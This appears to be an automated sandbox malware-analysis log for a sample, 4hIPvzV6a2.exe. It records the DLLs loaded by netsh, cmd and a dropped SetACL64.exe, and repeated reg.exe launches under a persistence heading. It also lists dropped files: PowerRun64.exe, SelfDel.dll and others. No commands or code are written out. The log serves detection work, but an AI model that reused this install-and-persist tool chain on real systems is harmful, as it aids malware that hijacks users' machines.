Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: activeds.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: adsldpc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: dfscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: 4hIPvzV6a2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdbp( source: oofzzwcvgbcojt.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: oofzzwcvgbcojt.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.1712894791.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.1714763251.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.1714131650.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.1716174174.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.1715095177.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.1717428003.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.1716547782.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.1717859358.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.1721888833.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.1720704714.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.1727313975.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.1724751367.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000002.1728519189.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000E.00000000.1727792891.00007FF68688B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: win_version_csharp.exe.0.drStatic PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exeJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SelfDel.dllJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exeJump to dropped file
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exeCode function: 7_2_00007FF686861DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_00007FF686861DAC
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\win_version_csharp.exeJump to dropped file
